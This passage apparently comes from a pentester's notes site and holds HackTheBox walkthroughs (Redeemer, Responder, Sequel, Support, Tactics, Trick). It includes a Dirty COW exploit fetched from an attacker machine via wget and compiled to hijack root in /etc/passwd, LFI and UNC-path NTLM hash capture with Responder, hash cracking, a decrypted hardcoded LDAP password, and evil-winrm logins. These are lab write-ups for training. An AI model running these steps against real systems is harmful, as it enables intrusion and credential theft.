centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-22555] Netfilter heap out-of-bounds write\n\n   Details: 
https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: less probable\n   Tags: ubuntu=20.04{kernel:5.8.0-*}\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n[+] [CVE-2019-18634] sudo pwfeedback\n\n   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/\n   Exposure: less probable\n   Tags: mint=19\n   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c\n   Comments: sudo configuration requires pwfeedback to be enabled.\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3\n   Exposure: less probable\n   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}\n   Download URL: https://www.exploit-db.com/download/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass\n\n[+] [CVE-2017-5618] setuid screen v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: less probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n

The second Dirty COW exploit works just fine: https://www.exploit-db.com/exploits/40839

Serve it from your attacker machine. And from the victim's:

wget http://<attacker machine>/40839.c\n\n\n# Compile with:\ngcc -pthread 40839.c -o dirty -lcrypt\n\n# Then run the newly created binary by either doing:\n./dirty\n# or\n./dirty <my-new-password>\n

Now, su to the user created by the exploit (it substitutes root in /etc/passwd) using the password you set, and you will be that user, with root's privileges.

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-redeemer/","title":"Walkthrough - A HackTheBox machine - Redeemer","text":"

    Enumerate open ports/services:

    nmap -sC -sV $ip -Pn -p-\n

    Results:

PORT     STATE SERVICE VERSION\n6379/tcp open  redis   Redis key-value store 5.0.7\n

See the 6379 Redis Cheat sheet (6379-redis.md).

Exploitation:

\u2514\u2500$ redis-cli -h 10.129.136.187 -p 6379         \n10.129.136.187:6379> INFO keyspace\n# Keyspace\ndb0:keys=4,expires=0,avg_ttl=0\n(0.60s)\n10.129.136.187:6379> select 0\nOK\n10.129.136.187:6379> keys *\n1) \"temp\"\n2) \"numb\"\n3) \"flag\"\n4) \"stor\"\n10.129.136.187:6379> get flag\n\"03e1d2b376c37ab3f5319922053953eb\"\n

    ","tags":["walkthrough","redis"]},{"location":"htb-responder/","title":"Responder - A HackTheBox machine","text":"
    nmap -sC -A 10.129.95.234 -Pn -p-\n

Open ports: 80 (http) and 5985 (WinRM, which we will use later to get a session).

Browsing to port 80, we are redirected to http://unika.htb, so we add this to /etc/hosts.

# sudo must apply to the write itself, not just to echo, so use tee\necho \"10.129.95.234    unika.htb\" | sudo tee -a /etc/hosts\n

    After that, we can browse the web and wander around.

There is an LFI (Local File Inclusion) vulnerability at the endpoint http://unika.htb/index.php?page=french.html. This is the request in Burp Suite:

    GET /index.php?page=../../../../../../../../windows/win.ini HTTP/1.1\nHost: unika.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://unika.htb/index.php?page=french.html\nUpgrade-Insecure-Requests: 1\n

From previous responses we know we are facing a PHP 8.1.1 server running on Windows, so we can use payloads for interesting Windows files. In this case, we would need some crafting to remove the "c:/" part, which we can do with the "cut" command.
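For instance, an illustrative one-liner:

echo 'c:/windows/win.ini' | cut -d'/' -f2-   # -> windows/win.ini\n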

We are going to use the tool Responder.py to capture the server's NetNTLMv2 hash. The idea is to stand up a rogue SMB server on our attacker machine with Responder; when we make the web server include a UNC path pointing at us, it authenticates against our SMB listener and Responder captures the hash.

    git clone https://github.com/lgandx/Responder.git   \ncd Responder\nsudo pip install -r requirements.txt\n./Responder.py -I tun1 -w -d\n

From the browser, request a path on our own machine through the LFI: http://unika.htb/index.php?page=//<attacker IP>/whatever. In my case:

    http://unika.htb/index.php?page=//10.10.14.2/lalala\n

    Now, from the Responder prompt we will have the hash:

    [SMB] NTLMv2-SSP Client   : 10.129.95.234\n[SMB] NTLMv2-SSP Username : RESPONDER\\Administrator\n[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\n

The NetNTLMv2 hash includes both the challenge (random bytes) and the encrypted response.
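For orientation, the captured string follows the standard NetNTLMv2 layout, roughly:

# <user>::<domain>:<server challenge>:<NTProofStr (HMAC-MD5)>:<blob>\nAdministrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:0101000000000000...\n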

    # Save hash in a file\necho \"Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\" > hash.txt\n

    Crack it with John the Ripper.

    john -w=/usr/share/wordlists/rockyou.txt hash.txt\n

    Results:

    Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator)     \n1g 0:00:00:00 DONE (2023-05-03 14:51) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo\nUse the \"--show --format=netntlmv2\" options to display all of the cracked passwords reliably\nSession completed. \n

So the password for Administrator is badminton.

Now, we will connect to WinRM (the Windows Remote Management service) on the target and try to get a session. For that, there is a tool called Evil-WinRM.

    evil-winrm -i <VictimIP> -u <username> -p <password>\n\n# In my case: \nevil-winrm -i 10.129.95.234 -u Administrator -p badminton\n

    You will get a powershell session. Browse around to find flag.txt.

    To echo it:

    type c:/users/mike/Desktop/flag.txt\n
    ","tags":["walkthrough","NTLM credential stealing","responder.py","local file inclusion","php include","web pentesting"]},{"location":"htb-sequel/","title":"Sequel - A HackTheBox machine","text":"
    nmap -sC -A 10.129.95.232 -Pn\n

    Results:

    Nmap scan report for 10.129.95.232\nHost is up (0.044s latency).\nNot shown: 999 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n3306/tcp open  mysql?\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 91\n|   Capabilities flags: 63486\n|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, FoundRows, SupportsTransactions, DontAllowDatabaseTableColumn, ODBCClient, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: d7$M6g&&+DSV7PkJptwz\n|_  Auth Plugin Name: mysql_native_password\n

Connect to the database with the mariadb client; the root user requires no password:

    mariadb -h 10.129.95.232 -u root\n
    MariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| htb                |\n| information_schema |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 rows in set (0.049 sec)\n\nMariaDB [(none)]> use htb;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\nDatabase changed\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.046 sec)\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.047 sec)\n\n\nMariaDB [htb]> show columns from config;\n+-------+---------------------+------+-----+---------+----------------+\n| Field | Type                | Null | Key | Default | Extra          |\n+-------+---------------------+------+-----+---------+----------------+\n| id    | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment |\n| name  | text                | YES  |     | NULL    |                |\n| value | text                | YES  |     | NULL    |                |\n+-------+---------------------+------+-----+---------+----------------+\n3 rows in set (0.046 sec)\n\n\nMariaDB [htb]> select id, name, value from config;\n+----+-----------------------+----------------------------------+\n| id | name                  | value                            |\n+----+-----------------------+----------------------------------+\n|  1 | timeout               | 60s                              |\n|  2 | security              | default                          |\n|  3 | auto_logon            | false                            |\n|  4 | max_size              | 2M                               |\n|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |\n|  6 | enable_uploads        | false                            |\n|  7 | authentication_method | radius                           |\n+----+-----------------------+----------------------------------+\n7 rows in set (0.046 sec)\n
    ","tags":["walkthrough","sql","port 3306","mariadb"]},{"location":"htb-support/","title":"Walkthrough - Support, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-support/#about-the-machine","title":"About the machine","text":"data Machine Support Platform Hackthebox url link creator 0xdf OS Windows Release data 30 July 2022 Difficulty Easy Points 20 ip 10.10.11.174","tags":["walkthrough"]},{"location":"htb-support/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

    Run:

    export ip=10.10.11.174\n
    ","tags":["walkthrough"]},{"location":"htb-support/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-support/#service-port-enumeration","title":"Service/ Port enumeration","text":"

Run nmap to enumerate open ports, services, OS, and traceroute. Do a general scan first, so as not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

    Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE\n53/tcp   open  domain\n88/tcp   open  kerberos-sec\n135/tcp  open  msrpc\n139/tcp  open  netbios-ssn\n389/tcp  open  ldap\n445/tcp  open  microsoft-ds\n464/tcp  open  kpasswd5\n593/tcp  open  http-rpc-epmap\n636/tcp  open  ldapssl\n3268/tcp open  globalcatLDAP\n3269/tcp open  globalcatLDAPssl\n\nNmap done: 1 IP address (1 host up) scanned in 7.90 seconds\n

    Once you know open ports, run nmap to see service versions and more details:

sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

    Results:

    Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE       VERSION\n53/tcp   open  domain        Simple DNS Plus\n88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-08 15:56:45Z)\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636/tcp  open  tcpwrapped\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n3269/tcp open  tcpwrapped\nService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-time:\n|   date: 2022-11-08T15:56:49\n|_  start_date: N/A\n| smb2-security-mode:\n|   3.1.1:\n|_    Message signing enabled and required\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 49.69 seconds\nzsh: segmentation fault  sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

A few facts we can gather from this scan: + there is a Windows Server running Active Directory LDAP on the machine. + LDAP and Kerberos are available. + Domain: support.htb (nmap reports it as support.htb0.).

    ","tags":["walkthrough"]},{"location":"htb-support/#enumerate","title":"Enumerate","text":"

    Now, we can perform some basic enumeration to gather data about the target.

    enum4linux 10.10.11.174\n

    Among the lines in the results, you can see these interesting lines:

    =========================================( Target Information )=========================================\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===================================( Session Check on 10.10.11.174 )===================================    \n[+] Server 10.10.11.174 allows sessions using username '', password ''\n\n================================( Getting domain SID for 10.10.11.174 )================================             \nDomain Name: SUPPORT                                                                     \nDomain Sid: S-1-5-21-1677581083-3380853377-188903654\n

Using the tool kerbrute, we enumerate valid usernames in the Active Directory:

    (kali\u327fkali)-[~/tools/kerbrute/dist]\n\u2514\u2500$ ./kerbrute_linux_amd64 userenum -d support --dc 10.10.11.174 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n

    Results:

        __             __               __     \n   / /_____  _____/ /_  _______  __/ /____\n  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/\n/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        \n\nVersion: dev (9cfb81e) - 11/09/22 - Ronnie Flathers @ropnop\n\n2022/11/09 05:16:54 >  Using KDC(s):\n2022/11/09 05:16:54 >   10.10.11.174:88\n\n2022/11/09 05:16:56 >  [+] VALID USERNAME:  support@support\n2022/11/09 05:16:57 >  [+] VALID USERNAME:  guest@support\n2022/11/09 05:17:03 >  [+] VALID USERNAME:  administrator@support\n2022/11/09 05:17:52 >  [+] VALID USERNAME:  Guest@support\n2022/11/09 05:17:53 >  [+] VALID USERNAME:  Administrator@support\n2022/11/09 05:19:42 >  [+] VALID USERNAME:  management@support\n2022/11/09 05:19:59 >  [+] VALID USERNAME:  Support@support\n2022/11/09 05:20:52 >  [+] VALID USERNAME:  GUEST@support\n2022/11/09 05:31:02 >  [+] VALID USERNAME:  SUPPORT@support\n

The same thing we did with kerbrute could also have been done with dnsrecon.

The SMB service is open, so we can try to enumerate the shares provided by the host:

    # -L looks at what services are available on a target and -N forces the tool not to ask for a password\nsmbclient -L //$ip -N\n

    Results:

            Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share\n        support-tools   Disk      support staff tools\n        SYSVOL          Disk      Logon server share\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n
    ","tags":["walkthrough"]},{"location":"htb-support/#initial-access","title":"Initial access","text":"

    After trying to connect to ADMIN$, C$, we connect to the share \"support-tools\":

smbclient //10.10.11.174/support-tools -N\n

This way, we obtain an SMB command prompt (smb: \\>). Typing help at that prompt shows which commands you can execute.

    Also, we list the content in the folder:

    dir\n

    Results:

    smb: \\> dir\n  .                                   D        0  Wed Jul 20 13:01:06 2022\n  ..                                  D        0  Sat May 28 07:18:25 2022\n  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022\n  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022\n  putty.exe                           A  1273576  Sat May 28 07:20:06 2022\n  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022\n  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022\n  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022\n  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022\n\n                4026367 blocks of size 4096. 968945 blocks available\n

We also check permissions on the share and learn that we only have read access. Now we retrieve all the files to take a closer look. Among the commands available is mget, so we run:

    mget *\n

    This will download all the files to the local folder from where you initiated your samba connection. Close the connection:

    quit\n

Now, have a close look at the downloaded files. Unzip the UserInfo.exe.zip file:

    unzip UserInfo.exe.zip\n

    After unzipping UserInfo.exe.zip, you have two files: UserInfo.exe and UserInfo.exe.config. Run:

    cat UserInfo.exe.config\n

    Result:

    <?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n    <startup>\n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.8\" />\n    </startup>\n  <runtime>\n    <assemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n      <dependentAssembly>\n        <assemblyIdentity name=\"System.Runtime.CompilerServices.Unsafe\" publicKeyToken=\"b03f5f7f11d50a3a\" culture=\"neutral\" />\n        <bindingRedirect oldVersion=\"0.0.0.0-6.0.0.0\" newVersion=\"6.0.0.0\" />\n      </dependentAssembly>\n    </assemblyBinding>\n  </runtime>\n</configuration>\n

From this, we know that UserInfo.exe is a .NET Framework binary. This executable appears to pull user information, likely from Active Directory. To inspect it further, we will need a .NET decompiler for Linux. Here we have several options.

Since it's open source and we are using a Kali virtual machine for this penetration test, let's use ILSpy (alternative tools are listed at the end of this walkthrough). You need to install it first, and it has dependencies such as the .NET 6.0 SDK, Avalonia, and dotnet. Install what you are asked for and, when done, run:

    cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n

    Open UserInfo.exe in the program and inspect the code. There are several parts in the code:

    • References
    • {}
    • {} UserInfo
    • {} UserInfo.Commands
    • {} UserInfo.Services

In UserInfo.Services you can find LdapQuery():

    using System.DirectoryServices;\n\npublic LdapQuery()\n{\n    //IL_0018: Unknown result type (might be due to invalid IL or missing references)\n    //IL_0022: Expected O, but got Unknown\n    //IL_0035: Unknown result type (might be due to invalid IL or missing references)\n    //IL_003f: Expected O, but got Unknown\n    string password = Protected.getPassword();\n    entry = new DirectoryEntry(\"LDAP://support.htb\", \"support\\\\ldap\", password);\n    entry.set_AuthenticationType((AuthenticationTypes)1);\n    ds = new DirectorySearcher(entry);\n}\n

From here, we can see that the LdapQuery() function logs in to the Active Directory with the user \"support\\ldap\". As the password, it uses the result of the getPassword() function. Let's click on that function in the code to see it:

    public static string getPassword()\n{\n    byte[] array = Convert.FromBase64String(enc_password);\n    byte[] array2 = array;\n    for (int i = 0; i < array.Length; i++)\n    {\n        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);\n    }\n    return Encoding.Default.GetString(array2);\n}\n

Here we can see the operations we will have to reverse in order to recover the password. Now, let's click on the two referenced members: \"enc_password\" and the private byte array \"key\".

# enc_password field\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static string enc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\n
    # private static byte[] key\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static byte[] key = Encoding.ASCII.GetBytes(\"armando\");\n

With these two last elements, we can write a script that reverses getPassword() and ultimately obtain the password the \"support\\ldap\" user uses to access the Active Directory.

Save the script as script.py with this content:

import base64\n\nenc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\nkey = b'armando'\n\narray = base64.b64decode(enc_password)\narray2 = ''\nfor i in range(len(array)):\n    array2 += chr(array[i] ^ key[i%len(key)] ^ 223)\n\nprint(array2)\n

Now, give script.py execution permissions and run it:

chmod +x script.py\npython script.py\n

The decrypted password is: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Before going on: there are other ways to get the password besides writing this Python script. One of them, for instance, involves:

    1. Opening a windows machine in the tun0 network range.
    2. Opening wireshark and capturing tun0 interface.
    3. Running the executable UserInfo.exe from the windows machine.
    4. Examining in wireshark the LDAP authentication packet (Follow TCP Stream in a request to port 389).

    Summing up, we have:

    • user: support
    • password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
    • ldap directory: support.htb

    Now we can use a tool such as ldapsearch to open a connection to the LDAP server, bind, and perform a search using specified parameters, like:

    -b searchbase   Use searchbase as the starting point for the search instead of the default.\n-x      Use simple authentication instead of SASL.\n-D binddn   Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.\n-w passwd       Use passwd as the password for simple authentication.\n-H ldapuri  Specify  URI(s)  referring  to  the  ldap  server(s); a list of URI, separated by whitespace or commas is expected\n

    Using ldapsearch, we run:

    # # ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n\nldapsearch -x -H ldap://support.htb -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=support,DC=htb\"\n

    Results are long and provided in text form. By using a tool such as ldapdomaindump we can get cool results in different formats: .grep, .html, and .json.

     ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n

    Then, we can run:

    firefox domain_users.html\n

    Results:

It looks like the support user account has the most permissions. We take a closer look at this user in the ldapsearch results:

    # support, Users, support.htb\ndn: CN=support,CN=Users,DC=support,DC=htb\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: support\nc: US\nl: Chapel Hill\nst: NC\npostalCode: 27514\ndistinguishedName: CN=support,CN=Users,DC=support,DC=htb\ninstanceType: 4\nwhenCreated: 20220528111200.0Z\nwhenChanged: 20221109173336.0Z\nuSNCreated: 12617\ninfo: Ironside47pleasure40Watchful\nmemberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb\nmemberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb\nuSNChanged: 81981\ncompany: support\nstreetAddress: Skipper Bowles Dr\nname: support\nobjectGUID:: CqM5MfoxMEWepIBTs5an8Q==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 0\nlastLogoff: 0\nlastLogon: 0\npwdLastSet: 132982099209777070\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==\naccountExpires: 9223372036854775807\nlogonCount: 0\nsAMAccountName: support\nsAMAccountType: 805306368\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb\ndSCorePropagationData: 20220528111201.0Z\ndSCorePropagationData: 16010101000000.0Z\nlastLogonTimestamp: 133124888166969633\n

There! The field \"info\" is usually left empty, but in this case you can read \"Ironside47pleasure40Watchful\", which might be a credential. Assuming that it is, we try to open a remote session as the support user. For that, there exists a tool called evil-winrm.

What does evil-winrm do? evil-winrm is a WinRM shell for hacking/pentesting purposes.

And what is WinRM? WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems to make life easier for system administrators. Download the evil-winrm repo here.

    Run:

    evil-winrm -i dc.support.htb -u support -p \"Ironside47pleasure40Watchful\"\n

    And we will connect to a powershell terminal: PS C:\\Users\\support\\Documents

    To get the user.txt flag, run:

    cd ..\ndir\ncd Desktop\ndir\ntype user.txt\n

    Result:

    561ec390613a0f53b431d3e14e923de6\n
    ","tags":["walkthrough"]},{"location":"htb-support/#getting-the-systems-flag","title":"Getting the System's flag","text":"

    Coming soon.

    ","tags":["walkthrough"]},{"location":"htb-support/#tools-in-this-lab","title":"Tools in this lab","text":"

Before going through this write-up, you may want to have a look at some of the tools needed to solve it, in case you prefer to investigate them and try harder instead of reading the solution directly.

    kerbrute

    Created by ropnop. Download repo. A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

Nicely written in Go, so to install it you first need to make sure that Go is installed. Otherwise, run:

    sudo apt update && sudo apt install golang\n

    Then, follow the instructions from the repo.

    enum4linux

Preinstalled on a Kali machine. A tool to exploit null sessions using some Perl scripts. Some useful commands:

# enumerate shares\nenum4linux -S $ip\n\n# enumerate users\nenum4linux -U $ip\n\n# enumerate machine list\nenum4linux -M $ip\n\n# display the password policy in case you need to mount a network authentication attack\nenum4linux -P $ip\n\n# specify username (-u) and password (-p) to use (default \"\")\nenum4linux -u <username> -p <password> $ip\n\n# you can also brute force share names by providing a file\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip\n

    dnspy

Created by a bunch of contributors. Download the repo. dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. There is a catch: this tool is Windows-only.

    To install, open powershell in windows and run:

git clone --recursive https://github.com/dnSpy/dnSpy.git\ncd dnSpy\n./build.ps1 -NoMsbuild\n

    ILSpy

Open source alternative to dnSpy. Download from the repo: ILSpy. To install ILSpy, you need some dependencies such as the .NET 6.0 SDK, Avalonia, and dotnet. Install what you are asked for and, when done, run:

    cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n
    ","tags":["walkthrough"]},{"location":"htb-support/#what-i-learned","title":"What I learned","text":"

When doing the Support machine I was faced with some challenging tasks:

    Enumerating shares as part of a Null session attack.

A null session attack exploits an authentication vulnerability in Windows administrative shares. It lets an attacker connect to a local or remote share without authentication, and thereby enumerate valuable information such as passwords, system users, system groups, and running processes. The challenge here was choosing the best-suited tools for this enumeration. On my mental list, I had:

    • Samba suite
    • Enum4linux

But there is also an nmap script for SMB enumeration, as shown below.
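For example, a sketch using standard NSE scripts:

nmap --script smb-enum-shares,smb-enum-users -p139,445 $ip\n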

    Finding a .NET decompiler for Linux

There are well-known decompilers out there. For Windows you have dnSpy and many more. On Linux you have the open source ILSpy. BUT: installation requires some dependencies. There are other options too (such as running Windows tools under Wine).

    Ldap enumerating tools

ldap-utils come preinstalled in Kali, but before this lab I hadn't had the chance to try them out.

    ldapsearch

    Syntax:

    ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n

    An example:

    ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=SUPPORT,DC=HTB\" | tee ldap_dc.support.htb.txt\n

    ldapdomaindump

    I have enjoyed this tool for real! It's pretty straightforward and you get legible results. An example of how to run it:

    ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n
    ","tags":["walkthrough"]},{"location":"htb-tactics/","title":"Tactics - A HackTheBox machine","text":"
    nmap -sC -A 10.129.228.98  -Pn -p-\n

    Results:

    PORT    STATE SERVICE       VERSION\n135/tcp open  msrpc         Microsoft Windows RPC\n139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp open  microsoft-ds?\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: -5s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 7476/tcp): CLEAN (Timeout)\n|   Check 2 (port 63095/tcp): CLEAN (Timeout)\n|   Check 3 (port 16465/udp): CLEAN (Timeout)\n|   Check 4 (port 43695/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-05-02T10:26:04\n|_  start_date: N/A\n

    Interesting part here is

    smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

This allows us to enumerate shares with smbclient without providing a password when connecting to the shared folder. For that, we use a well-known Windows user: Administrator.

    smbclient -L 10.129.228.98 -U Administrator\n

    Results:

            Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n
    smbclient \\\\\\\\10.129.228.98\\\\C$ -U Administrator\n

    Flag is located at:

    \\Users\\Administrator\\Desktop\\>flag.txt \n
    ","tags":["walkthrough","windows","smb","port 445"]},{"location":"htb-trick/","title":"Walkthrough - Trick, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-trick/#about-the-machine","title":"About the machine","text":"data Machine Trick Platform Hackthebox url link creator Geiseric OS Linux Release data 18 June 2022 Difficulty Easy Points 20 ip 10.10.11.166","tags":["walkthrough"]},{"location":"htb-trick/#recon","title":"Recon","text":"

    First, we run:

    export ip=10.10.11.166\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#service-port-enumeration","title":"Service/ Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS and traceroute

A general scan first, so as not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

